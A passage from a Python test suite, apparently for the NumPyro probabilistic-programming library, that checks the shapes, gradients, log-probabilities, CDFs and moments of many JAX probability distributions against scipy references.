constraints.multinomial):\n n = size[-1]\n return multinomial(\n key, p=jnp.ones((n,)) / n, n=constraint.upper_bound, shape=size[:-1]\n )\n elif constraint is constraints.corr_cholesky:\n return signed_stick_breaking_tril(\n random.uniform(\n key, size[:-2] + (size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1\n )\n )\n elif constraint is constraints.corr_matrix:\n cholesky = signed_stick_breaking_tril(\n random.uniform(\n key, size[:-2] + (size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1\n )\n )\n return jnp.matmul(cholesky, jnp.swapaxes(cholesky, -2, -1))\n elif constraint is constraints.lower_cholesky:\n return jnp.tril(random.uniform(key, size))\n elif constraint is constraints.positive_definite:\n x = random.normal(key, size)\n return jnp.matmul(x, jnp.swapaxes(x, -2, -1))\n elif constraint is constraints.ordered_vector:\n x = jnp.cumsum(random.exponential(key, size), -1)\n return x - random.normal(key, size[:-1] + (1,))\n elif isinstance(constraint, constraints.independent):\n return gen_values_within_bounds(constraint.base_constraint, size, key)\n elif constraint is constraints.sphere:\n x = random.normal(key, size)\n return x / jnp.linalg.norm(x, axis=-1)\n elif constraint is constraints.l1_ball:\n key1, key2 = random.split(key)\n sign = random.bernoulli(key1)\n bounds = [0, (-1) ** sign * 0.5]\n return random.uniform(key, size, float, *sorted(bounds))\n\n else:\n raise NotImplementedError(\"{} not implemented.\".format(constraint))\n\n\ndef gen_values_outside_bounds(constraint, size, key=random.PRNGKey(11)):\n if constraint is constraints.boolean:\n return random.bernoulli(key, shape=size) - 2\n elif isinstance(constraint, constraints.greater_than):\n return constraint.lower_bound - jnp.exp(random.normal(key, size))\n elif isinstance(constraint, constraints.integer_interval):\n lower_bound = jnp.broadcast_to(constraint.lower_bound, size)\n return random.randint(key, size, lower_bound - 1, lower_bound)\n elif isinstance(constraint, constraints.integer_greater_than):\n return constraint.lower_bound - random.poisson(key, np.array(5), shape=size)\n elif isinstance(constraint, constraints.interval):\n upper_bound = jnp.broadcast_to(constraint.upper_bound, size)\n return random.uniform(key, size, minval=upper_bound, maxval=upper_bound + 1.0)\n elif constraint in [constraints.real, constraints.real_vector]:\n return lax.full(size, np.nan)\n elif constraint is constraints.simplex:\n return osp.dirichlet.rvs(alpha=jnp.ones((size[-1],)), size=size[:-1]) + 1e-2\n elif isinstance(constraint, constraints.multinomial):\n n = size[-1]\n return (\n multinomial(\n key, p=jnp.ones((n,)) / n, n=constraint.upper_bound, shape=size[:-1]\n )\n + 1\n )\n elif constraint is constraints.corr_cholesky:\n return (\n signed_stick_breaking_tril(\n random.uniform(\n key,\n size[:-2] + (size[-1] * (size[-1] - 1) // 2,),\n minval=-1,\n maxval=1,\n )\n )\n + 1e-2\n )\n elif constraint is constraints.corr_matrix:\n cholesky = 1e-2 + signed_stick_breaking_tril(\n random.uniform(\n key, size[:-2] + (size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1\n )\n )\n return jnp.matmul(cholesky, jnp.swapaxes(cholesky, -2, -1))\n elif constraint is constraints.lower_cholesky:\n return random.uniform(key, size)\n elif constraint is constraints.positive_definite:\n return random.normal(key, size)\n elif constraint is constraints.ordered_vector:\n x = jnp.cumsum(random.exponential(key, size), -1)\n return x[..., ::-1]\n elif isinstance(constraint, constraints.independent):\n return gen_values_outside_bounds(constraint.base_constraint, size, key)\n elif constraint is constraints.sphere:\n x = random.normal(key, size)\n x = x / jnp.linalg.norm(x, axis=-1, keepdims=True)\n return 2 * x\n elif constraint is constraints.l1_ball:\n key1, key2 = random.split(key)\n sign = random.bernoulli(key1)\n bounds = [(-1) ** sign * 1.1, (-1) ** sign * 2]\n return random.uniform(key, size, float, *sorted(bounds))\n else:\n raise NotImplementedError(\"{} not implemented.\".format(constraint))\n\n\[email protected](\n \"jax_dist, sp_dist, params\", CONTINUOUS + DISCRETE + DIRECTIONAL\n)\[email protected](\"prepend_shape\", [(), (2,), (2, 3)])\ndef test_dist_shape(jax_dist, sp_dist, params, prepend_shape):\n jax_dist = jax_dist(*params)\n rng_key = random.PRNGKey(0)\n expected_shape = prepend_shape + jax_dist.batch_shape + jax_dist.event_shape\n samples = jax_dist.sample(key=rng_key, sample_shape=prepend_shape)\n assert isinstance(samples, jnp.ndarray)\n assert jnp.shape(samples) == expected_shape\n if (\n sp_dist\n and not _is_batched_multivariate(jax_dist)\n and not isinstance(jax_dist, dist.MultivariateStudentT)\n ):\n sp_dist = sp_dist(*params)\n sp_samples = sp_dist.rvs(size=prepend_shape + jax_dist.batch_shape)\n assert jnp.shape(sp_samples) == expected_shape\n elif (\n sp_dist\n and not _is_batched_multivariate(jax_dist)\n and isinstance(jax_dist, dist.MultivariateStudentT)\n ):\n sp_dist = sp_dist(*params)\n size_ = prepend_shape + jax_dist.batch_shape\n size = (1) if size_ == () else size_\n try:\n sp_samples = sp_dist.rvs(size=size)\n except ValueError:\n pytest.skip(\"scipy multivariate t doesn't support size with > 1 element\")\n assert jnp.shape(sp_samples) == expected_shape\n if isinstance(jax_dist, (dist.MultivariateNormal, dist.MultivariateStudentT)):\n assert jax_dist.covariance_matrix.ndim == len(jax_dist.batch_shape) + 2\n assert_allclose(\n jax_dist.precision_matrix,\n jnp.linalg.inv(jax_dist.covariance_matrix),\n rtol=1e-6,\n )\n\n\[email protected](\n \"jax_dist, sp_dist, params\", CONTINUOUS + DISCRETE + DIRECTIONAL\n)\ndef test_infer_shapes(jax_dist, sp_dist, params):\n shapes = tuple(getattr(p, \"shape\", ()) for p in params)\n shapes = tuple(x() if callable(x) else x for x in shapes)\n jax_dist = jax_dist(*params)\n try:\n expected_batch_shape, expected_event_shape = type(jax_dist).infer_shapes(\n *shapes\n )\n except NotImplementedError:\n pytest.skip(f\"{type(jax_dist).__name__}.infer_shapes() is not implemented\")\n assert jax_dist.batch_shape == expected_batch_shape\n assert jax_dist.event_shape == expected_event_shape\n\n\[email protected](\n \"jax_dist, sp_dist, params\", CONTINUOUS + DISCRETE + DIRECTIONAL\n)\ndef test_has_rsample(jax_dist, sp_dist, params):\n jax_dist = jax_dist(*params)\n masked_dist = jax_dist.mask(False)\n indept_dist = jax_dist.expand_by([2]).to_event(1)\n transf_dist = dist.TransformedDistribution(jax_dist, biject_to(constraints.real))\n assert masked_dist.has_rsample == jax_dist.has_rsample\n assert indept_dist.has_rsample == jax_dist.has_rsample\n assert transf_dist.has_rsample == jax_dist.has_rsample\n\n if jax_dist.has_rsample:\n assert isinstance(jax_dist, dist.Delta) or not jax_dist.is_discrete\n if isinstance(jax_dist, dist.TransformedDistribution):\n assert jax_dist.base_dist.has_rsample\n else:\n assert set(jax_dist.arg_constraints) == set(jax_dist.reparametrized_params)\n jax_dist.rsample(random.PRNGKey(0))\n if isinstance(jax_dist, dist.Normal):\n masked_dist.rsample(random.PRNGKey(0))\n indept_dist.rsample(random.PRNGKey(0))\n transf_dist.rsample(random.PRNGKey(0))\n else:\n with pytest.raises(NotImplementedError):\n jax_dist.rsample(random.PRNGKey(0))\n if isinstance(jax_dist, dist.BernoulliProbs):\n with pytest.raises(NotImplementedError):\n masked_dist.rsample(random.PRNGKey(0))\n with pytest.raises(NotImplementedError):\n indept_dist.rsample(random.PRNGKey(0))\n with pytest.raises(NotImplementedError):\n transf_dist.rsample(random.PRNGKey(0))\n\n\[email protected](\"batch_shape\", [(), (4,), (3, 2)])\ndef test_unit(batch_shape):\n log_factor = random.normal(random.PRNGKey(0), batch_shape)\n d = dist.Unit(log_factor=log_factor)\n x = d.sample(random.PRNGKey(1))\n assert x.shape == batch_shape + (0,)\n assert (d.log_prob(x) == log_factor).all()\n\n\[email protected](\"jax_dist, sp_dist, params\", CONTINUOUS)\ndef test_sample_gradient(jax_dist, sp_dist, params):\n # we have pathwise gradient for gamma sampler\n gamma_derived_params = {\n \"Gamma\": [\"concentration\"],\n \"Beta\": [\"concentration1\", \"concentration0\"],\n \"BetaProportion\": [\"mean\", \"concentration\"],\n \"Chi2\": [\"df\"],\n \"Dirichlet\": [\"concentration\"],\n \"InverseGamma\": [\"concentration\"],\n \"LKJ\": [\"concentration\"],\n \"LKJCholesky\": [\"concentration\"],\n \"StudentT\": [\"df\"],\n }.get(jax_dist.__name__, [])\n\n dist_args = [\n p\n for p in (\n inspect.getfullargspec(jax_dist.__init__)[0][1:]\n if inspect.isclass(jax_dist)\n # account the the case jax_dist is a function\n else inspect.getfullargspec(jax_dist)[0]\n )\n ]\n params_dict = dict(zip(dist_args[: len(params)], params))\n\n jax_class = type(jax_dist(**params_dict))\n reparametrized_params = [\n p for p in jax_class.reparametrized_params if p not in gamma_derived_params\n ]\n if not reparametrized_params:\n pytest.skip(\"{} not reparametrized.\".format(jax_class.__name__))\n\n nonrepara_params_dict = {\n k: v for k, v in params_dict.items() if k not in reparametrized_params\n }\n repara_params = tuple(\n v for k, v in params_dict.items() if k in reparametrized_params\n )\n\n rng_key = random.PRNGKey(0)\n\n def fn(args):\n args_dict = dict(zip(reparametrized_params, args))\n return jnp.sum(\n jax_dist(**args_dict, **nonrepara_params_dict).sample(key=rng_key)\n )\n\n actual_grad = jax.grad(fn)(repara_params)\n assert len(actual_grad) == len(repara_params)\n\n eps = 1e-3\n for i in range(len(repara_params)):\n if repara_params[i] is None:\n continue\n args_lhs = [p if j != i else p - eps for j, p in enumerate(repara_params)]\n args_rhs = [p if j != i else p + eps for j, p in enumerate(repara_params)]\n fn_lhs = fn(args_lhs)\n fn_rhs = fn(args_rhs)\n # finite diff approximation\n expected_grad = (fn_rhs - fn_lhs) / (2.0 * eps)\n assert jnp.shape(actual_grad[i]) == jnp.shape(repara_params[i])\n assert_allclose(jnp.sum(actual_grad[i]), expected_grad, rtol=0.02, atol=0.03)\n\n\[email protected](\n \"jax_dist, params\",\n [\n (dist.Gamma, (1.0,)),\n (dist.Gamma, (0.1,)),\n (dist.Gamma, (10.0,)),\n (dist.Chi2, (1.0,)),\n (dist.Chi2, (0.1,)),\n (dist.Chi2, (10.0,)),\n (dist.Beta, (1.0, 1.0)),\n (dist.StudentT, (5.0, 2.0, 4.0)),\n ],\n)\ndef test_pathwise_gradient(jax_dist, params):\n rng_key = random.PRNGKey(0)\n N = 1000000\n\n def f(params):\n z = jax_dist(*params).sample(key=rng_key, sample_shape=(N,))\n return (z + z**2).mean(0)\n\n def g(params):\n d = jax_dist(*params)\n return d.mean + d.variance + d.mean**2\n\n actual_grad = grad(f)(params)\n expected_grad = grad(g)(params)\n assert_allclose(actual_grad, expected_grad, rtol=0.005)\n\n\[email protected](\n \"jax_dist, sp_dist, params\", CONTINUOUS + DISCRETE + DIRECTIONAL\n)\ndef test_jit_log_likelihood(jax_dist, sp_dist, params):\n if jax_dist.__name__ in (\n \"EulerMaruyama\",\n \"GaussianRandomWalk\",\n \"_ImproperWrapper\",\n \"LKJ\",\n \"LKJCholesky\",\n \"_SparseCAR\",\n ):\n pytest.xfail(reason=\"non-jittable params\")\n\n rng_key = random.PRNGKey(0)\n samples = jax_dist(*params).sample(key=rng_key, sample_shape=(2, 3))\n\n def log_likelihood(*params):\n return jax_dist(*params).log_prob(samples)\n\n expected = log_likelihood(*params)\n actual = jax.jit(log_likelihood)(*params)\n assert_allclose(actual, expected, atol=2e-5, rtol=2e-5)\n\n\[email protected](\n \"jax_dist, sp_dist, params\", CONTINUOUS + DISCRETE + DIRECTIONAL\n)\[email protected](\"prepend_shape\", [(), (2,), (2, 3)])\[email protected](\"jit\", [False, True])\ndef test_log_prob(jax_dist, sp_dist, params, prepend_shape, jit):\n jit_fn = _identity if not jit else jax.jit\n jax_dist = jax_dist(*params)\n\n rng_key = random.PRNGKey(0)\n samples = jax_dist.sample(key=rng_key, sample_shape=prepend_shape)\n assert jax_dist.log_prob(samples).shape == prepend_shape + jax_dist.batch_shape\n truncated_dists = (\n dist.LeftTruncatedDistribution,\n dist.RightTruncatedDistribution,\n dist.TwoSidedTruncatedDistribution,\n )\n if sp_dist is None:\n if isinstance(jax_dist, truncated_dists):\n if isinstance(params[0], dist.Distribution):\n # new api\n loc, scale, low, high = (\n params[0].loc,\n params[0].scale,\n params[1],\n params[2],\n )\n else:\n # old api\n loc, scale, low, high = params\n if low is None:\n low = -np.inf\n if high is None:\n high = np.inf\n sp_dist = get_sp_dist(type(jax_dist.base_dist))(loc, scale)\n expected = sp_dist.logpdf(samples) - jnp.log(\n sp_dist.cdf(high) - sp_dist.cdf(low)\n )\n assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected, atol=1e-5)\n return\n pytest.skip(\"no corresponding scipy distn.\")\n if _is_batched_multivariate(jax_dist):\n pytest.skip(\"batching not allowed in multivariate distns.\")\n if jax_dist.event_shape and prepend_shape:\n # >>> d = sp.dirichlet([1.1, 1.1])\n # >>> samples = d.rvs(size=(2,))\n # >>> d.logpdf(samples)\n # ValueError: The input vector 'x' must lie within the normal simplex ...\n pytest.skip(\"batched samples cannot be scored by multivariate distributions.\")\n sp_dist = sp_dist(*params)\n try:\n expected = sp_dist.logpdf(samples)\n except AttributeError:\n expected = sp_dist.logpmf(samples)\n except ValueError as e:\n # precision issue: jnp.sum(x / jnp.sum(x)) = 0.99999994 != 1\n if \"The input vector 'x' must lie within the normal simplex.\" in str(e):\n samples = jax.device_get(samples).astype(\"float64\")\n samples = samples / samples.sum(axis=-1, keepdims=True)\n expected = sp_dist.logpdf(samples)\n else:\n raise e\n assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected, atol=1e-5)\n\n\ndef test_mixture_log_prob():\n gmm = dist.MixtureSameFamily(\n dist.Categorical(logits=np.zeros(2)), dist.Normal(0, 1).expand([2])\n )\n actual = gmm.log_prob(0.0)\n expected = dist.Normal(0, 1).log_prob(0.0)\n assert_allclose(actual, expected)\n\n\[email protected](\n \"jax_dist, sp_dist, params\",\n # TODO: add more complete pattern for Discrete.cdf\n CONTINUOUS + [T(dist.Poisson, 2.0), T(dist.Poisson, np.array([2.0, 3.0, 5.0]))],\n)\[email protected](\"ignore:overflow encountered:RuntimeWarning\")\ndef test_cdf_and_icdf(jax_dist, sp_dist, params):\n d = jax_dist(*params)\n if d.event_dim > 0:\n pytest.skip(\"skip testing cdf/icdf methods of multivariate distributions\")\n samples = d.sample(key=random.PRNGKey(0), sample_shape=(100,))\n quantiles = random.uniform(random.PRNGKey(1), (100,) + d.shape())\n try:\n rtol = 2e-3 if jax_dist in (dist.Gamma, dist.StudentT) else 1e-5\n if d.shape() == () and not d.is_discrete:\n assert_allclose(\n jax.vmap(jax.grad(d.cdf))(samples),\n jnp.exp(d.log_prob(samples)),\n atol=1e-5,\n rtol=rtol,\n )\n assert_allclose(\n jax.vmap(jax.grad(d.icdf))(quantiles),\n jnp.exp(-d.log_prob(d.icdf(quantiles))),\n atol=1e-5,\n rtol=rtol,\n )\n assert_allclose(d.cdf(d.icdf(quantiles)), quantiles, atol=1e-5, rtol=1e-5)\n assert_allclose(d.icdf(d.cdf(samples)), samples, atol=1e-5, rtol=rtol)\n except NotImplementedError:\n pass\n\n # test against scipy\n if not sp_dist:\n pytest.skip(\"no corresponding scipy distn.\")\n sp_dist = sp_dist(*params)\n try:\n actual_cdf = d.cdf(samples)\n expected_cdf = sp_dist.cdf(samples)\n assert_allclose(actual_cdf, expected_cdf, atol=1e-5, rtol=1e-5)\n actual_icdf = d.icdf(quantiles)\n expected_icdf = sp_dist.ppf(quantiles)\n assert_allclose(actual_icdf, expected_icdf, atol=1e-4, rtol=1e-4)\n except NotImplementedError:\n pass\n\n\[email protected](\"jax_dist, sp_dist, params\", CONTINUOUS + DIRECTIONAL)\ndef test_gof(jax_dist, sp_dist, params):\n if \"Improper\" in jax_dist.__name__:\n pytest.skip(\"distribution has improper .log_prob()\")\n if \"LKJ\" in jax_dist.__name__:\n pytest.xfail(\"incorrect submanifold scaling\")\n if jax_dist is dist.EulerMaruyama:\n d = jax_dist(*params)\n if d.event_dim > 1:\n pytest.skip(\"EulerMaruyama skip test when event shape is non-trivial.\")\n\n num_samples = 10000\n if \"BetaProportion\" in jax_dist.__name__:\n num_samples = 20000\n rng_key = random.PRNGKey(0)\n d = jax_dist(*params)\n samples = d.sample(key=rng_key, sample_shape=(num_samples,))\n probs = np.exp(d.log_prob(samples))\n\n dim = None\n if jax_dist is dist.ProjectedNormal:\n dim = samples.shape[-1] - 1\n\n # Test each batch independently.\n probs = probs.reshape(num_samples, -1)\n samples = samples.reshape(probs.shape + d.event_shape)\n if \"Dirichlet\" in jax_dist.__name__:\n # The Dirichlet density is over all but one of the probs.\n samples = samples[..., :-1]\n for b in range(probs.shape[1]):\n try:\n gof = auto_goodness_of_fit(samples[:, b], probs[:, b], dim=dim)\n except InvalidTest:\n pytest.skip(\"expensive test\")\n else:\n assert gof > TEST_FAILURE_RATE\n\n\[email protected](\"jax_dist, sp_dist, params\", CONTINUOUS + DISCRETE)\ndef test_independent_shape(jax_dist, sp_dist, params):\n d = jax_dist(*params)\n batch_shape, event_shape = d.batch_shape, d.event_shape\n shape = batch_shape + event_shape\n for i in range(len(batch_shape)):\n indep = dist.Independent(d, reinterpreted_batch_ndims=i)\n sample = indep.sample(random.PRNGKey(0))\n event_boundary = len(shape) - len(event_shape) - i\n assert indep.batch_shape == shape[:event_boundary]\n assert indep.event_shape == shape[event_boundary:]\n assert jnp.shape(indep.log_prob(sample)) == shape[:event_boundary]\n\n\ndef _tril_cholesky_to_tril_corr(x):\n w = vec_to_tril_matrix(x, diagonal=-1)\n diag = jnp.sqrt(1 - jnp.sum(w**2, axis=-1))\n cholesky = w + jnp.expand_dims(diag, axis=-1) * jnp.identity(w.shape[-1])\n corr = jnp.matmul(cholesky, cholesky.T)\n return matrix_to_tril_vec(corr, diagonal=-1)\n\n\[email protected](\"dimension\", [2, 3, 5])\ndef test_log_prob_LKJCholesky_uniform(dimension):\n # When concentration=1, the distribution of correlation matrices is uniform.\n # We will test that fact here.\n d = dist.LKJCholesky(dimension=dimension, concentration=1)\n N = 5\n corr_log_prob = []\n for i in range(N):\n sample = d.sample(random.PRNGKey(i))\n log_prob = d.log_prob(sample)\n sample_tril = matrix_to_tril_vec(sample, diagonal=-1)\n cholesky_to_corr_jac = np.linalg.slogdet(\n jax.jacobian(_tril_cholesky_to_tril_corr)(sample_tril)\n )[1]\n corr_log_prob.append(log_prob - cholesky_to_corr_jac)\n\n corr_log_prob = np.array(corr_log_prob)\n # test if they are constant\n assert_allclose(\n corr_log_prob,\n jnp.broadcast_to(corr_log_prob[0], corr_log_prob.shape),\n rtol=1e-6,\n )\n\n if dimension == 2:\n # when concentration = 1, LKJ gives a uniform distribution over correlation matrix,\n # hence for the case dimension = 2,\n # density of a correlation matrix will be Uniform(-1, 1) = 0.5.\n # In addition, jacobian of the transformation from cholesky -> corr is 1 (hence its\n # log value is 0) because the off-diagonal lower triangular element does not change\n # in the transform.\n # So target_log_prob = log(0.5)\n assert_allclose(corr_log_prob[0], jnp.log(0.5), rtol=1e-6)\n\n\[email protected](\"dimension\", [2, 3, 5])\[email protected](\"concentration\", [0.6, 2.2])\ndef test_log_prob_LKJCholesky(dimension, concentration):\n # We will test against the fact that LKJCorrCholesky can be seen as a\n # TransformedDistribution with base distribution is a distribution of partial\n # correlations in C-vine method (modulo an affine transform to change domain from (0, 1)\n # to (1, 0)) and transform is a signed stick-breaking process.\n d = dist.LKJCholesky(dimension, concentration, sample_method=\"cvine\")\n\n beta_sample = d._beta.sample(random.PRNGKey(0))\n beta_log_prob = jnp.sum(d._beta.log_prob(beta_sample))\n partial_correlation = 2 * beta_sample - 1\n affine_logdet = beta_sample.shape[-1] * jnp.log(2)\n sample = signed_stick_breaking_tril(partial_correlation)\n\n # compute signed stick breaking logdet\n inv_tanh = lambda t: jnp.log((1 + t) / (1 - t)) / 2 # noqa: E731\n inv_tanh_logdet = jnp.sum(jnp.log(vmap(grad(inv_tanh))(partial_correlation)))\n unconstrained = inv_tanh(partial_correlation)\n corr_cholesky_logdet = biject_to(constraints.corr_cholesky).log_abs_det_jacobian(\n unconstrained, sample\n )\n signed_stick_breaking_logdet = corr_cholesky_logdet + inv_tanh_logdet\n\n actual_log_prob = d.log_prob(sample)\n expected_log_prob = beta_log_prob - affine_logdet - signed_stick_breaking_logdet\n assert_allclose(actual_log_prob, expected_log_prob, rtol=2e-5)\n\n assert_allclose(jax.jit(d.log_prob)(sample), d.log_prob(sample), atol=2e-6)\n\n\ndef test_zero_inflated_logits_probs_agree():\n concentration = np.exp(np.random.normal(1))\n rate = np.exp(np.random.normal(1))\n d = dist.GammaPoisson(concentration, rate)\n gate_logits = np.random.normal(0)\n gate_probs = expit(gate_logits)\n zi_logits = dist.ZeroInflatedDistribution(d, gate_logits=gate_logits)\n zi_probs = dist.ZeroInflatedDistribution(d, gate=gate_probs)\n sample = np.random.randint(\n 0,\n 20,\n (\n 1000,\n 100,\n ),\n )\n assert_allclose(zi_probs.log_prob(sample), zi_logits.log_prob(sample))\n\n\[email protected](\"rate\", [0.1, 0.5, 0.9, 1.0, 1.1, 2.0, 10.0])\ndef test_ZIP_log_prob(rate):\n # if gate is 0 ZIP is Poisson\n zip_ = dist.ZeroInflatedPoisson(0.0, rate)\n pois = dist.Poisson(rate)\n s = zip_.sample(random.PRNGKey(0), (20,))\n zip_prob = zip_.log_prob(s)\n pois_prob = pois.log_prob(s)\n assert_allclose(zip_prob, pois_prob, rtol=1e-6)\n\n # if gate is 1 ZIP is Delta(0)\n zip_ = dist.ZeroInflatedPoisson(1.0, rate)\n delta = dist.Delta(0.0)\n s = np.array([0.0, 1.0])\n zip_prob = zip_.log_prob(s)\n delta_prob = delta.log_prob(s)\n assert_allclose(zip_prob, delta_prob, rtol=1e-6)\n\n\[email protected](\"total_count\", [1, 2, 3, 10])\[email protected](\"shape\", [(1,), (3, 1), (2, 3, 1)])\ndef test_beta_binomial_log_prob(total_count, shape):\n concentration0 = np.exp(np.random.normal(size=shape))\n concentration1 = np.exp(np.random.normal(size=shape))\n value = jnp.arange(1 + total_count)\n\n num_samples = 100000\n probs = np.random.beta(concentration1, concentration0, size=(num_samples,) + shape)\n log_probs = dist.Binomial(total_count, probs).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n\n actual = dist.BetaBinomial(concentration1, concentration0, total_count).log_prob(\n value\n )\n assert_allclose(actual, expected, rtol=0.02)\n\n\[email protected](\"total_count\", [1, 2, 3, 10])\[email protected](\"batch_shape\", [(1,), (3, 1), (2, 3, 1)])\ndef test_dirichlet_multinomial_log_prob(total_count, batch_shape):\n event_shape = (3,)\n concentration = np.exp(np.random.normal(size=batch_shape + event_shape))\n # test on one-hots\n value = total_count * jnp.eye(event_shape[-1]).reshape(\n event_shape + (1,) * len(batch_shape) + event_shape\n )\n\n num_samples = 100000\n probs = dist.Dirichlet(concentration).sample(random.PRNGKey(0), (num_samples, 1))\n log_probs = dist.Multinomial(total_count, probs).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n\n actual = dist.DirichletMultinomial(concentration, total_count).log_prob(value)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected](\"shape\", [(1,), (3, 1), (2, 3, 1)])\ndef test_gamma_poisson_log_prob(shape):\n gamma_conc = np.exp(np.random.normal(size=shape))\n gamma_rate = np.exp(np.random.normal(size=shape))\n value = jnp.arange(15)\n\n num_samples = 300000\n poisson_rate = np.random.gamma(\n gamma_conc, 1 / gamma_rate, size=(num_samples,) + shape\n )\n log_probs = dist.Poisson(poisson_rate).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.GammaPoisson(gamma_conc, gamma_rate).log_prob(value)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected](\n \"jax_dist, sp_dist, params\", CONTINUOUS + DISCRETE + DIRECTIONAL\n)\ndef test_log_prob_gradient(jax_dist, sp_dist, params):\n if jax_dist in [dist.LKJ, dist.LKJCholesky]:\n pytest.skip(\"we have separated tests for LKJCholesky distribution\")\n if jax_dist is _ImproperWrapper:\n pytest.skip(\"no param for ImproperUniform to test for log_prob gradient\")\n\n rng_key = random.PRNGKey(0)\n value = jax_dist(*params).sample(rng_key)\n\n def fn(*args):\n return jnp.sum(jax_dist(*args).log_prob(value))\n\n eps = 1e-3\n for i in range(len(params)):\n if jax_dist is dist.EulerMaruyama and i == 1:\n # skip taking grad w.r.t. sde_fn\n continue\n if jax_dist is _SparseCAR and i == 3:\n # skip taking grad w.r.t. adj_matrix\n continue\n if isinstance(\n params[i], dist.Distribution\n ): # skip taking grad w.r.t. base_dist\n continue\n if params[i] is None or jnp.result_type(params[i]) in (jnp.int32, jnp.int64):\n continue\n actual_grad = jax.grad(fn, i)(*params)\n args_lhs = [p if j != i else p - eps for j, p in enumerate(params)]\n args_rhs = [p if j != i else p + eps for j, p in enumerate(params)]\n fn_lhs = fn(*args_lhs)\n fn_rhs = fn(*args_rhs)\n # finite diff approximation\n expected_grad = (fn_rhs - fn_lhs) / (2.0 * eps)\n assert jnp.shape(actual_grad) == jnp.shape(params[i])\n if i == 0 and jax_dist is dist.Delta:\n # grad w.r.t. `value` of Delta distribution will be 0\n # but numerical value will give nan (= inf - inf)\n expected_grad = 0.0\n assert_allclose(jnp.sum(actual_grad), expected_grad, rtol=0.01, atol=0.01)\n\n\[email protected](\n \"jax_dist, sp_dist, params\", CONTINUOUS + DISCRETE + DIRECTIONAL\n)\ndef test_mean_var(jax_dist, sp_dist, params):\n if jax_dist is _ImproperWrapper:\n pytest.skip(\"Improper distribution does not has mean/var implemented\")\n if jax_dist is FoldedNormal:\n pytest.skip(\"Folded distribution does not has mean/var implemented\")\n if jax_dist is dist.EulerMaruyama:\n pytest.skip(\"EulerMaruyama distribution does not has mean/var implemented\")\n if jax_dist is dist.RelaxedBernoulliLogits:\n pytest.skip(\"RelaxedBernoulli distribution does not has mean/var implemented\")\n if \"SineSkewed\" in jax_dist.__name__:\n pytest.skip(\"Skewed Distribution are not symmetric about location.\")\n if jax_dist in (\n _TruncatedNormal,\n _TruncatedCauchy,\n dist.LeftTruncatedDistribution,\n dist.RightTruncatedDistribution,\n dist.TwoSidedTruncatedDistribution,\n ):\n pytest.skip(\"Truncated distributions do not has mean/var implemented\")\n if jax_dist is dist.ProjectedNormal:\n pytest.skip(\"Mean is defined in submanifold\")\n\n n = (\n 20000\n if jax_dist in [dist.LKJ, dist.LKJCholesky, dist.SineBivariateVonMises]\n else 200000\n )\n d_jax = jax_dist(*params)\n k = random.PRNGKey(0)\n samples = d_jax.sample(k, sample_shape=(n,)).astype(np.float32)\n # check with suitable scipy implementation if available\n # XXX: VonMises is already tested below\n if (\n sp_dist\n and not _is_batched_multivariate(d_jax)\n and jax_dist\n not in [dist.VonMises, dist.MultivariateStudentT, dist.MatrixNormal]\n ):\n d_sp = sp_dist(*params)\n try:\n sp_mean = d_sp.mean()\n except TypeError: # mvn does not have .mean() method\n sp_mean = d_sp.mean\n # for multivariate distns try .cov first\n if d_jax.event_shape:\n try:\n sp_var = jnp.diag(d_sp.cov())\n except TypeError: # mvn does not have .cov() method\n sp_var = jnp.diag(d_sp.cov)\n except AttributeError:\n sp_var = d_sp.var()\n else:\n sp_var = d_sp.var()\n assert_allclose(d_jax.mean, sp_mean, rtol=0.01, atol=1e-7)\n assert_allclose(d_jax.variance, sp_var, rtol=0.01, atol=1e-7)\n if jnp.all(jnp.isfinite(sp_mean)):\n assert_allclose(jnp.mean(samples, 0), d_jax.mean, rtol=0.05, atol=1e-2)\n if jnp.all(jnp.isfinite(sp_var)):\n assert_allclose(\n jnp.std(samples, 0), jnp.sqrt(d_jax.variance), rtol=0.05, atol=1e-2\n )\n elif jax_dist in [dist.LKJ, dist.LKJCholesky]:\n if jax_dist is dist.LKJCholesky:\n corr_samples = jnp.matmul(samples, jnp.swapaxes(samples, -2, -1))\n else:\n corr_samples = samples\n dimension, concentration, _ = params\n # marginal of off-diagonal entries\n marginal = dist.Beta(\n concentration + 0.5 * (dimension - 2), concentration + 0.5 * (dimension - 2)\n )\n # scale statistics due to linear mapping\n marginal_mean = 2 * marginal.mean - 1\n marginal_std = 2 * jnp.sqrt(marginal.variance)\n expected_mean = jnp.broadcast_to(\n jnp.reshape(marginal_mean, jnp.shape(marginal_mean) + (1, 1)),\n jnp.shape(marginal_mean) + d_jax.event_shape,\n )\n expected_std = jnp.broadcast_to(\n jnp.reshape(marginal_std, jnp.shape(marginal_std) + (1, 1)),\n jnp.shape(marginal_std) + d_jax.event_shape,\n )\n # diagonal elements of correlation matrices are 1\n expected_mean = expected_mean * (1 - jnp.identity(dimension)) + jnp.identity(\n dimension\n )\n expected_std = expected_std * (1 - jnp.identity(dimension))\n\n assert_allclose(jnp.mean(corr_samples, axis=0), expected_mean, atol=0.01)\n assert_allclose(jnp.std(corr_samples, axis=0), expected_std, atol=0.01)\n elif jax_dist in [dist.VonMises]:\n # circular mean = sample mean\n assert_allclose(d_jax.mean, jnp.mean(samples, 0), rtol=0.05, atol=1e-2)\n\n # circular variance\n x, y = jnp.mean(jnp.cos(samples), 0), jnp.mean(jnp.sin(samples), 0)\n\n expected_variance = 1 - jnp.sqrt(x**2 + y**2)\n assert_allclose(d_jax.variance, expected_variance, rtol=0.05, atol=1e-2)\n elif jax_dist in [dist.SineBivariateVonMises]:\n phi_loc = _circ_mean(samples[..., 0])\n psi_loc = _circ_mean(samples[..., 1])\n\n assert_allclose(\n d_jax.mean, jnp.stack((phi_loc, psi_loc), axis=-1), rtol=0.05, atol=1e-2\n )\n elif jax_dist in [dist.MatrixNormal]:\n sample_shape = (200_000,)\n # use X ~ MN(loc, U, V) then vec(X) ~ MVN(vec(loc), kron(V, U))\n if len(d_jax.batch_shape) > 0:\n axes = [len(sample_shape) + i for i in range(len(d_jax.batch_shape))]\n axes = 